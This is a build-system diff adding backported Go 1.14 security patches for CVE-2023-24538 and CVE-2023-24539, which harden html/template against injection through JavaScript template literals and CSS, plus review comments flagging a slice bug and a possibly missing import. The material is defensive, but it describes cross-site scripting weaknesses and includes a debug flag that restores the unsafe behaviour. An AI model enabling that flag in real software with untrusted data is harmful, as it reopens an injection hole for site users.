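+@@ -920,6 +920,22 @@ func TestErrors(t *testing.T) {
+ "<a href='/foo?{{range .Items}}&{{.K}}={{.V}}{{end}}'>",
+ "",
+ },
++ {
++ "{{range .Items}}<a{{if .X}}{{end}}>{{end}}",
++ "",
++ },
++ {
++ "{{range .Items}}<a{{if .X}}{{end}}>{{continue}}{{end}}",
++ "",
++ },
++ {
++ "{{range .Items}}<a{{if .X}}{{end}}>{{break}}{{end}}",
++ "",
++ },
++ {
++ "{{range .Items}}<a{{if .X}}{{end}}>{{if .X}}{{break}}{{end}}{{end}}",
++ "",
++ },
+ // Error cases.
+ {
+ "{{if .Cond}}<a{{end}}",
+@@ -956,6 +972,14 @@ func TestErrors(t *testing.T) {
+ "z:2:8: on range loop re-entry: {{range}} branches",
+ },
+ {
++ "{{range .Items}}<a{{if .X}}{{break}}{{end}}>{{end}}",
++ "z:1:29: at range loop break: {{range}} branches end in different contexts",
++ },
++ {
++ "{{range .Items}}<a{{if .X}}{{continue}}{{end}}>{{end}}",
++ "z:1:29: at range loop continue: {{range}} branches end in different contexts",
++ },
++ {
+ "<a b=1 c={{.H}}",
+ "z: ends in a non-text context: {stateAttr delimSpaceOrTagEnd",
+ },
+diff --git a/src/text/template/doc.go b/src/text/template/doc.go
+index 7b30294..0228b15 100644
+--- a/src/text/template/doc.go
++++ b/src/text/template/doc.go
+@@ -112,6 +112,14 @@ data, defined in detail in the corresponding sections that follow.
+ T0 is executed; otherwise, dot is set to the successive elements
+ of the array, slice, or map and T1 is executed.
+
++ {{break}}
++ The innermost {{range pipeline}} loop is ended early, stopping the
++ current iteration and bypassing all remaining iterations.
++
++ {{continue}}
++ The current iteration of the innermost {{range pipeline}} loop is
++ stopped, and the loop starts the next iteration.
++
+ {{template "name"}}
+ The template with the specified name is executed with nil data.
+
+diff --git a/src/text/template/exec.go b/src/text/template/exec.go
+index 7ac5175..6cb140a 100644
+--- a/src/text/template/exec.go
++++ b/src/text/template/exec.go
+@@ -5,6 +5,7 @@
+ package template
+
+ import (
++ "errors"
+ "fmt"
+ "internal/fmtsort"
+ "io"
+@@ -244,6 +245,12 @@ func (t *Template) DefinedTemplates() string {
+ return b.String()
+ }
+
++// Sentinel errors for use with panic to signal early exits from range loops.
++var (
++ walkBreak = errors.New("break")
++ walkContinue = errors.New("continue")
++)
++
+ // Walk functions step through the major pieces of the template structure,
+ // generating output as they go.
+ func (s *state) walk(dot reflect.Value, node parse.Node) {
+@@ -256,7 +263,11 @@ func (s *state) walk(dot reflect.Value, node parse.Node) {
+ if len(node.Pipe.Decl) == 0 {
+ s.printValue(node, val)
+ }
++ case *parse.BreakNode:
++ panic(walkBreak)
+ case *parse.CommentNode:
++ case *parse.ContinueNode:
++ panic(walkContinue)
+ case *parse.IfNode:
+ s.walkIfOrWith(parse.NodeIf, dot, node.Pipe, node.List, node.ElseList)
+ case *parse.ListNode:
+@@ -335,6 +346,11 @@ func isTrue(val reflect.Value) (truth, ok bool) {
+
+ func (s *state) walkRange(dot reflect.Value, r *parse.RangeNode) {
+ s.at(r)
++ defer func() {
++ if r := recover(); r != nil && r != walkBreak {
++ panic(r)
++ }
++ }()
+ defer s.pop(s.mark())
+ val, _ := indirect(s.evalPipeline(dot, r.Pipe))
+ // mark top of stack before any variables in the body are pushed.
+@@ -348,8 +364,14 @@ func (s *state) walkRange(dot reflect.Value, r *parse.RangeNode) {
+ if len(r.Pipe.Decl) > 1 {
+ s.setTopVar(2, index)
+ }
++ defer s.pop(mark)
++ defer func() {
++ // Consume panic(walkContinue)
++ if r := recover(); r != nil && r != walkContinue {
++ panic(r)
++ }
++ }()
+ s.walk(elem, r.List)
+- s.pop(mark)
+ }
+ switch val.Kind() {
+ case reflect.Array, reflect.Slice:
+diff --git a/src/text/template/exec_test.go b/src/text/template/exec_test.go
+index 3309b33..a639f44 100644
+--- a/src/text/template/exec_test.go
++++ b/src/text/template/exec_test.go
+@@ -563,6 +563,8 @@ var execTests = []execTest{
+ {"range empty no else", "{{range .SIEmpty}}-{{.}}-{{end}}", "", tVal, true},
+ {"range []int else", "{{range .SI}}-{{.}}-{{else}}EMPTY{{end}}", "-3--4--5-", tVal, true},
+ {"range empty else", "{{range .SIEmpty}}-{{.}}-{{else}}EMPTY{{end}}", "EMPTY", tVal, true},
++ {"range []int break else", "{{range .SI}}-{{.}}-{{break}}NOTREACHED{{else}}EMPTY{{end}}", "-3-", tVal, true},
++ {"range []int continue else", "{{range .SI}}-{{.}}-{{continue}}NOTREACHED{{else}}EMPTY{{end}}", "-3--4--5-", tVal, true},
+ {"range []bool", "{{range .SB}}-{{.}}-{{end}}", "-true--false-", tVal, true},
+ {"range []int method", "{{range .SI | .MAdd .I}}-{{.}}-{{end}}", "-20--21--22-", tVal, true},
+ {"range map", "{{range .MSI}}-{{.}}-{{end}}", "-1--3--2-", tVal, true},
+diff --git a/src/text/template/parse/lex.go b/src/text/template/parse/lex.go
+index 6784071..95e3377 100644
+--- a/src/text/template/parse/lex.go
++++ b/src/text/template/parse/lex.go
+@@ -62,6 +62,8 @@ const (
+ // Keywords appear after all the rest.
+ itemKeyword // used only to delimit the keywords
+ itemBlock // block keyword
++ itemBreak // break keyword
++ itemContinue // continue keyword
+ itemDot // the cursor, spelled '.'
+ itemDefine // define keyword
+ itemElse // else keyword
+@@ -76,6 +78,8 @@ const (
+ var key = map[string]itemType{
+ ".": itemDot,
+ "block": itemBlock,
++ "break": itemBreak,
++ "continue": itemContinue,
+ "define": itemDefine,
+ "else": itemElse,
+ "end": itemEnd,
+@@ -119,6 +123,8 @@ type lexer struct {
+ parenDepth int // nesting depth of ( ) exprs
+ line int // 1+number of newlines seen
+ startLine int // start line of this item
++ breakOK bool // break keyword allowed
++ continueOK bool // continue keyword allowed
+ }
+
+ // next returns the next rune in the input.
+@@ -461,7 +467,12 @@ Loop:
+ }
+ switch {
+ case key[word] > itemKeyword:
+- l.emit(key[word])
++ item := key[word]
++ if item == itemBreak && !l.breakOK || item == itemContinue && !l.continueOK {
++ l.emit(itemIdentifier)
++ } else {
++ l.emit(item)
++ }
+ case word[0] == '.':
+ l.emit(itemField)
+ case word == "true", word == "false":
+diff --git a/src/text/template/parse/lex_test.go b/src/text/template/parse/lex_test.go
+index 6510eed..df6aabf 100644
+--- a/src/text/template/parse/lex_test.go
++++ b/src/text/template/parse/lex_test.go
+@@ -35,6 +35,8 @@ var itemName = map[itemType]string{
+ // keywords
+ itemDot: ".",
+ itemBlock: "block",
++ itemBreak: "break",
++ itemContinue: "continue",
+ itemDefine: "define",
+ itemElse: "else",
+ itemIf: "if",
+diff --git a/src/text/template/parse/node.go b/src/text/template/parse/node.go
+index a9dad5e..c398da0 100644
+--- a/src/text/template/parse/node.go
++++ b/src/text/template/parse/node.go
+@@ -71,6 +71,8 @@ const (
+ NodeVariable // A $ variable.
+ NodeWith // A with action.
+ NodeComment // A comment.
++ NodeBreak // A break action.
++ NodeContinue // A continue action.
+ )
+
+ // Nodes.
+@@ -907,6 +909,40 @@ func (i *IfNode) Copy() Node {
+ return i.tr.newIf(i.Pos, i.Line, i.Pipe.CopyPipe(), i.List.CopyList(), i.ElseList.CopyList())
+ }
+
++// BreakNode represents a {{break}} action.
++type BreakNode struct {
++ tr *Tree
++ NodeType
++ Pos
++ Line int
++}
++
++func (t *Tree) newBreak(pos Pos, line int) *BreakNode {
++ return &BreakNode{tr: t, NodeType: NodeBreak, Pos: pos, Line: line}
++}
++
++func (b *BreakNode) Copy() Node { return b.tr.newBreak(b.Pos, b.Line) }
++func (b *BreakNode) String() string { return "{{break}}" }
++func (b *BreakNode) tree() *Tree { return b.tr }
++func (b *BreakNode) writeTo(sb *strings.Builder) { sb.WriteString("{{break}}") }
++
++// ContinueNode represents a {{continue}} action.
++type ContinueNode struct {
++ tr *Tree
++ NodeType
++ Pos
++ Line int
++}
++
++func (t *Tree) newContinue(pos Pos, line int) *ContinueNode {
++ return &ContinueNode{tr: t, NodeType: NodeContinue, Pos: pos, Line: line}
++}
++
++func (c *ContinueNode) Copy() Node { return c.tr.newContinue(c.Pos, c.Line) }
++func (c *ContinueNode) String() string { return "{{continue}}" }
++func (c *ContinueNode) tree() *Tree { return c.tr }
++func (c *ContinueNode) writeTo(sb *strings.Builder) { sb.WriteString("{{continue}}") }
++
+ // RangeNode represents a {{range}} action and its commands.
+ type RangeNode struct {
+ BranchNode
+diff --git a/src/text/template/parse/parse.go b/src/text/template/parse/parse.go
+index 5e6e512..7f78b56 100644
+--- a/src/text/template/parse/parse.go
++++ b/src/text/template/parse/parse.go
+@@ -31,6 +31,7 @@ type Tree struct {
+ vars []string // variables defined at the moment.
+ treeSet map[string]*Tree
+ actionLine int // line of left delim starting action
++ rangeDepth int
+ mode Mode
+ }
+
+@@ -223,6 +224,8 @@ func (t *Tree) startParse(funcs []map[string]interface{}, lex *lexer, treeSet ma
+ t.vars = []string{"$"}
+ t.funcs = funcs
+ t.treeSet = treeSet
++ lex.breakOK = !t.hasFunction("break")
++ lex.continueOK = !t.hasFunction("continue")
+ }
+
+ // stopParse terminates parsing.
+@@ -385,6 +388,10 @@ func (t *Tree) action() (n Node) {
+ switch token := t.nextNonSpace(); token.typ {
+ case itemBlock:
+ return t.blockControl()
++ case itemBreak:
++ return t.breakControl(token.pos, token.line)
++ case itemContinue:
++ return t.continueControl(token.pos, token.line)
+ case itemElse:
+ return t.elseControl()
+ case itemEnd:
+@@ -404,6 +411,32 @@ func (t *Tree) action() (n Node) {
+ return t.newAction(token.pos, token.line, t.pipeline("command", itemRightDelim))
+ }
+
++// Break:
++// {{break}}
++// Break keyword is past.
++func (t *Tree) breakControl(pos Pos, line int) Node {
++ if token := t.next(); token.typ != itemRightDelim {
++ t.unexpected(token, "in {{break}}")
++ }
++ if t.rangeDepth == 0 {
++ t.errorf("{{break}} outside {{range}}")
++ }
++ return t.newBreak(pos, line)
++}
++
++// Continue:
++// {{continue}}
++// Continue keyword is past.
++func (t *Tree) continueControl(pos Pos, line int) Node {
++ if token := t.next(); token.typ != itemRightDelim {
++ t.unexpected(token, "in {{continue}}")
++ }
++ if t.rangeDepth == 0 {
++ t.errorf("{{continue}} outside {{range}}")
++ }
++ return t.newContinue(pos, line)
++}
++
+ // Pipeline:
+ // declarations? command ('|' command)*
+ func (t *Tree) pipeline(context string, end itemType) (pipe *PipeNode) {
+@@ -479,8 +512,14 @@ func (t *Tree) checkPipeline(pipe *PipeNode, context string) {
+ func (t *Tree) parseControl(allowElseIf bool, context string) (pos Pos, line int, pipe *PipeNode, list, elseList *ListNode) {
+ defer t.popVars(len(t.vars))
+ pipe = t.pipeline(context, itemRightDelim)
++ if context == "range" {
++ t.rangeDepth++
++ }
+ var next Node
+ list, next = t.itemList()
++ if context == "range" {
++ t.rangeDepth--
++ }
+ switch next.Type() {
+ case nodeEnd: //done
+ case nodeElse:
+@@ -522,7 +561,8 @@ func (t *Tree) ifControl() Node {
+ // {{range pipeline}} itemList {{else}} itemList {{end}}
+ // Range keyword is past.
+ func (t *Tree) rangeControl() Node {
+- return t.newRange(t.parseControl(false, "range"))
++ r := t.newRange(t.parseControl(false, "range"))
++ return r
+ }
+
+ // With:
+diff --git a/src/text/template/parse/parse_test.go b/src/text/template/parse/parse_test.go
+index 220f984..ba45636 100644
+--- a/src/text/template/parse/parse_test.go
++++ b/src/text/template/parse/parse_test.go
+@@ -230,6 +230,10 @@ var parseTests = []parseTest{
+ `{{range $x := .SI}}{{.}}{{end}}`},
+ {"range 2 vars", "{{range $x, $y := .SI}}{{.}}{{end}}", noError,
+ `{{range $x, $y := .SI}}{{.}}{{end}}`},
++ {"range with break", "{{range .SI}}{{.}}{{break}}{{end}}", noError,
++ `{{range .SI}}{{.}}{{break}}{{end}}`},
++ {"range with continue", "{{range .SI}}{{.}}{{continue}}{{end}}", noError,
++ `{{range .SI}}{{.}}{{continue}}{{end}}`},
+ {"constants", "{{range .SI 1 -3.2i true false 'a' nil}}{{end}}", noError,
+ `{{range .SI 1 -3.2i true false 'a' nil}}{{end}}`},
+ {"template", "{{template `x`}}", noError,
+@@ -279,6 +283,10 @@ var parseTests = []parseTest{
+ {"adjacent args", "{{printf 3`x`}}", hasError, ""},
+ {"adjacent args with .", "{{printf `x`.}}", hasError, ""},
+ {"extra end after if", "{{if .X}}a{{else if .Y}}b{{end}}{{end}}", hasError, ""},
++ {"break outside range", "{{range .}}{{end}} {{break}}", hasError, ""},
++ {"continue outside range", "{{range .}}{{end}} {{continue}}", hasError, ""},
++ {"break in range else", "{{range .}}{{else}}{{break}}{{end}}", hasError, ""},
++ {"continue in range else", "{{range .}}{{else}}{{continue}}{{end}}", hasError, ""},
+ // Other kinds of assignments and operators aren't available yet.
+ {"bug0a", "{{$x := 0}}{{$x}}", noError, "{{$x := 0}}{{$x}}"},
+ {"bug0b", "{{$x += 1}}{{$x}}", hasError, ""},
+--
+2.7.4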
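Review bot: In the `case *parse.ContinueNode:` arm this patch adds to `escaper.escape` (src/html/template/escape.go), the recorded context is appended to the wrong slice: `e.rangeContext.continues = append(e.rangeContext.breaks, c)`. Every `{{continue}}` therefore overwrites `continues` with the break contexts plus the current one, so the contexts of earlier `{{continue}}` actions in the same loop never reach `joinRange`, and a range body whose continues end in different HTML/JS/CSS contexts may not be rejected by the escaper. It also puts break contexts into the loop that asserts `c.n.(*parse.ContinueNode)`. I would carry the one-line correction `e.rangeContext.continues = append(e.rangeContext.continues, c)` in the backport and add a TestErrors case with two `{{continue}}` actions in different contexts; it is worth checking whether upstream has since made the same correction so the patch can cite it.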
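--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538_6.patch
@@ -0,0 +1,371 @@
+From 16f4882984569f179d73967c9eee679bb9b098c5 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Mon, 20 Mar 2023 11:01:13 -0700
+Subject: [PATCH 6/6] html/template: disallow actions in JS template literals
+
+ECMAScript 6 introduced template literals[0][1] which are delimited with
+backticks. These need to be escaped in a similar fashion to the
+delimiters for other string literals. Additionally template literals can
+contain special syntax for string interpolation.
+
+There is no clear way to allow safe insertion of actions within JS
+template literals, as handling (JS) string interpolation inside of these
+literals is rather complex. As such we've chosen to simply disallow
+template actions within these template literals.
+
+A new error code is added for this parsing failure case, errJsTmplLit,
+but it is unexported as it is not backwards compatible with other minor
+release versions to introduce an API change in a minor release. We will
+export this code in the next major release.
+
+The previous behavior (with the cavet that backticks are now escaped
+properly) can be re-enabled with GODEBUG=jstmpllitinterp=1.
+
+This change subsumes CL471455.
+
+Thanks to Sohom Datta, Manipal Institute of Technology, for reporting
+this issue.
+
+Fixes CVE-2023-24538
+For #59234
+Fixes #59271
+
+[0] https://tc39.es/ecma262/multipage/ecmascript-language-expressions.html#sec-template-literals
+[1] https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Template_literals
+
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802457
+Reviewed-by: Damien Neil <dneil@google.com>
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802612
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Change-Id: Ic7f10595615f2b2740d9c85ad7ef40dc0e78c04c
+Reviewed-on: https://go-review.googlesource.com/c/go/+/481987
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+Reviewed-by: Matthew Dempsky <mdempsky@google.com>
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/b1e3ecfa06b67014429a197ec5e134ce4303ad9b
+CVE: CVE-2023-24538
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/html/template/context.go | 2 ++
+ src/html/template/error.go | 13 ++++++++
+ src/html/template/escape.go | 11 +++++++
+ src/html/template/escape_test.go | 66 ++++++++++++++++++++++-----------------
+ src/html/template/js.go | 2 ++
+ src/html/template/js_test.go | 2 +-
+ src/html/template/jsctx_string.go | 9 ++++++
+ src/html/template/state_string.go | 37 ++++++++++++++++++++--
+ src/html/template/transition.go | 7 ++++-
+ 9 files changed, 116 insertions(+), 33 deletions(-)
+
+diff --git a/src/html/template/context.go b/src/html/template/context.go
+index f7d4849..0b65313 100644
+--- a/src/html/template/context.go
++++ b/src/html/template/context.go
+@@ -116,6 +116,8 @@ const (
+ stateJSDqStr
+ // stateJSSqStr occurs inside a JavaScript single quoted string.
+ stateJSSqStr
++ // stateJSBqStr occurs inside a JavaScript back quoted string.
++ stateJSBqStr
+ // stateJSRegexp occurs inside a JavaScript regexp literal.
+ stateJSRegexp
+ // stateJSBlockCmt occurs inside a JavaScript /* block comment */.
+diff --git a/src/html/template/error.go b/src/html/template/error.go
+index 0e52706..fd26b64 100644
+--- a/src/html/template/error.go
++++ b/src/html/template/error.go
+@@ -211,6 +211,19 @@ const (
+ // pipeline occurs in an unquoted attribute value context, "html" is
+ // disallowed. Avoid using "html" and "urlquery" entirely in new templates.
+ ErrPredefinedEscaper
++
++ // errJSTmplLit: "... appears in a JS template literal"
++ // Example:
++ // <script>var tmpl = `{{.Interp}`</script>
++ // Discussion:
++ // Package html/template does not support actions inside of JS template
++ // literals.
++ //
++ // TODO(rolandshoemaker): we cannot add this as an exported error in a minor
++ // release, since it is backwards incompatible with the other minor
++ // releases. As such we need to leave it unexported, and then we'll add it
++ // in the next major release.
++ errJSTmplLit
+ )
+
+ func (e *Error) Error() string {
+diff --git a/src/html/template/escape.go b/src/html/template/escape.go
+index f12dafa..29ca5b3 100644
+--- a/src/html/template/escape.go
++++ b/src/html/template/escape.go
+@@ -8,6 +8,7 @@ import (
+ "bytes"
+ "fmt"
+ "html"
++ "internal/godebug"
+ "io"
+ "text/template"
+ "text/template/parse"
+@@ -203,6 +204,16 @@ func (e *escaper) escapeAction(c context, n *parse.ActionNode) context {
+ c.jsCtx = jsCtxDivOp
+ case stateJSDqStr, stateJSSqStr:
+ s = append(s, "_html_template_jsstrescaper")
++ case stateJSBqStr:
++ debugAllowActionJSTmpl := godebug.Get("jstmpllitinterp")
++ if debugAllowActionJSTmpl == "1" {
++ s = append(s, "_html_template_jsstrescaper")
++ } else {
++ return context{
++ state: stateError,
++ err: errorf(errJSTmplLit, n, n.Line, "%s appears in a JS template literal", n),
++ }
++ }
+ case stateJSRegexp:
+ s = append(s, "_html_template_jsregexpescaper")
+ case stateCSS:
+diff --git a/src/html/template/escape_test.go b/src/html/template/escape_test.go
+index fa2b84a..1b150e9 100644
+--- a/src/html/template/escape_test.go
++++ b/src/html/template/escape_test.go
+@@ -681,35 +681,31 @@ func TestEscape(t *testing.T) {
+ }
+
+ for _, test := range tests {
+- tmpl := New(test.name)
+- tmpl = Must(tmpl.Parse(test.input))
+- // Check for bug 6459: Tree field was not set in Parse.
+- if tmpl.Tree != tmpl.text.Tree {
+- t.Errorf("%s: tree not set properly", test.name)
+- continue
+- }
+- b := new(bytes.Buffer)
+- if err := tmpl.Execute(b, data); err != nil {
+- t.Errorf("%s: template execution failed: %s", test.name, err)
+- continue
+- }
+- if w, g := test.output, b.String(); w != g {
+- t.Errorf("%s: escaped output: want\n\t%q\ngot\n\t%q", test.name, w, g)
+- continue
+- }
+- b.Reset()
+- if err := tmpl.Execute(b, pdata); err != nil {
+- t.Errorf("%s: template execution failed for pointer: %s", test.name, err)
+- continue
+- }
+- if w, g := test.output, b.String(); w != g {
+- t.Errorf("%s: escaped output for pointer: want\n\t%q\ngot\n\t%q", test.name, w, g)
+- continue
+- }
+- if tmpl.Tree != tmpl.text.Tree {
+- t.Errorf("%s: tree mismatch", test.name)
+- continue
+- }
++ t.Run(test.name, func(t *testing.T) {
++ tmpl := New(test.name)
++ tmpl = Must(tmpl.Parse(test.input))
++ // Check for bug 6459: Tree field was not set in Parse.
++ if tmpl.Tree != tmpl.text.Tree {
++ t.Fatalf("%s: tree not set properly", test.name)
++ }
++ b := new(strings.Builder)
++ if err := tmpl.Execute(b, data); err != nil {
++ t.Fatalf("%s: template execution failed: %s", test.name, err)
++ }
++ if w, g := test.output, b.String(); w != g {
++ t.Fatalf("%s: escaped output: want\n\t%q\ngot\n\t%q", test.name, w, g)
++ }
++ b.Reset()
++ if err := tmpl.Execute(b, pdata); err != nil {
++ t.Fatalf("%s: template execution failed for pointer: %s", test.name, err)
++ }
++ if w, g := test.output, b.String(); w != g {
++ t.Fatalf("%s: escaped output for pointer: want\n\t%q\ngot\n\t%q", test.name, w, g)
++ }
++ if tmpl.Tree != tmpl.text.Tree {
++ t.Fatalf("%s: tree mismatch", test.name)
++ }
++ })
+ }
+ }
+
+@@ -936,6 +932,10 @@ func TestErrors(t *testing.T) {
+ "{{range .Items}}<a{{if .X}}{{end}}>{{if .X}}{{break}}{{end}}{{end}}",
+ "",
+ },
++ {
++ "<script>var a = `${a+b}`</script>`",
++ "",
++ },
+ // Error cases.
+ {
+ "{{if .Cond}}<a{{end}}",
+@@ -1082,6 +1082,10 @@ func TestErrors(t *testing.T) {
+ // html is allowed since it is the last command in the pipeline, but urlquery is not.
+ `predefined escaper "urlquery" disallowed in template`,
+ },
++ {
++ "<script>var tmpl = `asd {{.}}`;</script>",
++ `{{.}} appears in a JS template literal`,
++ },
+ }
+ for _, test := range tests {
+ buf := new(bytes.Buffer)
+@@ -1304,6 +1308,10 @@ func TestEscapeText(t *testing.T) {
+ context{state: stateJSSqStr, delim: delimDoubleQuote, attr: attrScript},
+ },
+ {
++ "<a onclick=\"`foo",
++ context{state: stateJSBqStr, delim: delimDoubleQuote, attr: attrScript},
++ },
++ {
+ `<A ONCLICK="'`,
+ context{state: stateJSSqStr, delim: delimDoubleQuote, attr: attrScript},
+ },
+diff --git a/src/html/template/js.go b/src/html/template/js.go
+index ea9c183..b888eaf 100644
+--- a/src/html/template/js.go
++++ b/src/html/template/js.go
+@@ -308,6 +308,7 @@ var jsStrReplacementTable = []string{
+ // Encode HTML specials as hex so the output can be embedded
+ // in HTML attributes without further encoding.
+ '"': `\u0022`,
++ '`': `\u0060`,
+ '&': `\u0026`,
+ '\'': `\u0027`,
+ '+': `\u002b`,
+@@ -331,6 +332,7 @@ var jsStrNormReplacementTable = []string{
+ '"': `\u0022`,
+ '&': `\u0026`,
+ '\'': `\u0027`,
++ '`': `\u0060`,
+ '+': `\u002b`,
+ '/': `\/`,
+ '<': `\u003c`,
+diff --git a/src/html/template/js_test.go b/src/html/template/js_test.go
+index d7ee47b..7d963ae 100644
+--- a/src/html/template/js_test.go
++++ b/src/html/template/js_test.go
+@@ -292,7 +292,7 @@ func TestEscapersOnLower7AndSelectHighCodepoints(t *testing.T) {
+ `0123456789:;\u003c=\u003e?` +
+ `@ABCDEFGHIJKLMNO` +
+ `PQRSTUVWXYZ[\\]^_` +
+- "`abcdefghijklmno" +
++ "\\u0060abcdefghijklmno" +
+ "pqrstuvwxyz{|}~\u007f" +
+ "\u00A0\u0100\\u2028\\u2029\ufeff\U0001D11E",
+ },
+diff --git a/src/html/template/jsctx_string.go b/src/html/template/jsctx_string.go
+index dd1d87e..2394893 100644
+--- a/src/html/template/jsctx_string.go
++++ b/src/html/template/jsctx_string.go
+@@ -4,6 +4,15 @@ package template
+
+ import "strconv"
+
++func _() {
++ // An "invalid array index" compiler error signifies that the constant values have changed.
++ // Re-run the stringer command to generate them again.
++ var x [1]struct{}
++ _ = x[jsCtxRegexp-0]
++ _ = x[jsCtxDivOp-1]
++ _ = x[jsCtxUnknown-2]
++}
++
+ const _jsCtx_name = "jsCtxRegexpjsCtxDivOpjsCtxUnknown"
+
+ var _jsCtx_index = [...]uint8{0, 11, 21, 33}
+diff --git a/src/html/template/state_string.go b/src/html/template/state_string.go
+index 05104be..6fb1a6e 100644
+--- a/src/html/template/state_string.go
++++ b/src/html/template/state_string.go
+@@ -4,9 +4,42 @@ package template
+
+ import "strconv"
+
+-const _state_name = "stateTextstateTagstateAttrNamestateAfterNamestateBeforeValuestateHTMLCmtstateRCDATAstateAttrstateURLstateSrcsetstateJSstateJSDqStrstateJSSqStrstateJSRegexpstateJSBlockCmtstateJSLineCmtstateCSSstateCSSDqStrstateCSSSqStrstateCSSDqURLstateCSSSqURLstateCSSURLstateCSSBlockCmtstateCSSLineCmtstateError"
++func _() {
++ // An "invalid array index" compiler error signifies that the constant values have changed.
++ // Re-run the stringer command to generate them again.
++ var x [1]struct{}
++ _ = x[stateText-0]
++ _ = x[stateTag-1]
++ _ = x[stateAttrName-2]
++ _ = x[stateAfterName-3]
++ _ = x[stateBeforeValue-4]
++ _ = x[stateHTMLCmt-5]
++ _ = x[stateRCDATA-6]
++ _ = x[stateAttr-7]
++ _ = x[stateURL-8]
++ _ = x[stateSrcset-9]
++ _ = x[stateJS-10]
++ _ = x[stateJSDqStr-11]
++ _ = x[stateJSSqStr-12]
++ _ = x[stateJSBqStr-13]
++ _ = x[stateJSRegexp-14]
++ _ = x[stateJSBlockCmt-15]
++ _ = x[stateJSLineCmt-16]
++ _ = x[stateCSS-17]
++ _ = x[stateCSSDqStr-18]
++ _ = x[stateCSSSqStr-19]
++ _ = x[stateCSSDqURL-20]
++ _ = x[stateCSSSqURL-21]
++ _ = x[stateCSSURL-22]
++ _ = x[stateCSSBlockCmt-23]
++ _ = x[stateCSSLineCmt-24]
++ _ = x[stateError-25]
++ _ = x[stateDead-26]
++}
++
++const _state_name = "stateTextstateTagstateAttrNamestateAfterNamestateBeforeValuestateHTMLCmtstateRCDATAstateAttrstateURLstateSrcsetstateJSstateJSDqStrstateJSSqStrstateJSBqStrstateJSRegexpstateJSBlockCmtstateJSLineCmtstateCSSstateCSSDqStrstateCSSSqStrstateCSSDqURLstateCSSSqURLstateCSSURLstateCSSBlockCmtstateCSSLineCmtstateErrorstateDead"
+
+-var _state_index = [...]uint16{0, 9, 17, 30, 44, 60, 72, 83, 92, 100, 111, 118, 130, 142, 155, 170, 184, 192, 205, 218, 231, 244, 255, 271, 286, 296}
++var _state_index = [...]uint16{0, 9, 17, 30, 44, 60, 72, 83, 92, 100, 111, 118, 130, 142, 154, 167, 182, 196, 204, 217, 230, 243, 256, 267, 283, 298, 308, 317}
+
+ func (i state) String() string {
+ if i >= state(len(_state_index)-1) {
+diff --git a/src/html/template/transition.go b/src/html/template/transition.go
+index 06df679..92eb351 100644
+--- a/src/html/template/transition.go
++++ b/src/html/template/transition.go
+@@ -27,6 +27,7 @@ var transitionFunc = [...]func(context, []byte) (context, int){
+ stateJS: tJS,
+ stateJSDqStr: tJSDelimited,
+ stateJSSqStr: tJSDelimited,
++ stateJSBqStr: tJSDelimited,
+ stateJSRegexp: tJSDelimited,
+ stateJSBlockCmt: tBlockCmt,
+ stateJSLineCmt: tLineCmt,
+@@ -262,7 +263,7 @@ func tURL(c context, s []byte) (context, int) {
+
+ // tJS is the context transition function for the JS state.
+ func tJS(c context, s []byte) (context, int) {
+- i := bytes.IndexAny(s, `"'/`)
++ i := bytes.IndexAny(s, "\"`'/")
+ if i == -1 {
+ // Entire input is non string, comment, regexp tokens.
+ c.jsCtx = nextJSCtx(s, c.jsCtx)
+@@ -274,6 +275,8 @@ func tJS(c context, s []byte) (context, int) {
+ c.state, c.jsCtx = stateJSDqStr, jsCtxRegexp
+ case '\'':
+ c.state, c.jsCtx = stateJSSqStr, jsCtxRegexp
++ case '`':
++ c.state, c.jsCtx = stateJSBqStr, jsCtxRegexp
+ case '/':
+ switch {
+ case i+1 < len(s) && s[i+1] == '/':
+@@ -303,6 +306,8 @@ func tJSDelimited(c context, s []byte) (context, int) {
+ switch c.state {
+ case stateJSSqStr:
+ specials = `\'`
++ case stateJSBqStr:
++ specials = "`\\"
+ case stateJSRegexp:
+ specials = `\/[]`
+ }
+--
+2.7.4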
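Review bot: The `"internal/godebug"` import added to src/html/template/escape.go is not supplied by anything in this patch's diffstat, and as far as I know that package first appeared in a Go release later than 1.14, so unless an earlier patch in this series adds it, html/template in the go-1.14 recipe will fail to build. Please confirm with a build of the recipe, and if the package is missing either add it as a further dependency patch or read the `jstmpllitinterp` setting from GODEBUG without it. Separately, the `jstmpllitinterp=1` branch in `escapeAction` restores actions inside backtick literals using only `_html_template_jsstrescaper`, which the commit message itself describes as having no clearly safe handling, so a comment on that branch such as `// GODEBUG=jstmpllitinterp=1 re-enables actions in JS template literals; avoid with untrusted data` would help downstream users.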
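--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24539.patch
@@ -0,0 +1,60 @@
+From 8673ca81e5340b87709db2d9749c92a3bf925df1 Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Thu, 13 Apr 2023 15:40:44 -0700
+Subject: [PATCH] html/template: disallow angle brackets in CSS values
+
+Angle brackets should not appear in CSS contexts, as they may affect
+token boundaries (such as closing a <style> tag, resulting in
+injection). Instead emit filterFailsafe, matching the behavior for other
+dangerous characters.
+
+Thanks to Juho Nurminen of Mattermost for reporting this issue.
+
+Fixes #59720
+Fixes CVE-2023-24539
+
+Change-Id: Iccc659c9a18415992b0c05c178792228e3a7bae4
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1826636
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/491615
+Reviewed-by: Dmitri Shuralyov <dmitshur@golang.org>
+Reviewed-by: Dmitri Shuralyov <dmitshur@google.com>
+Run-TryBot: Carlos Amedee <carlos@golang.org>
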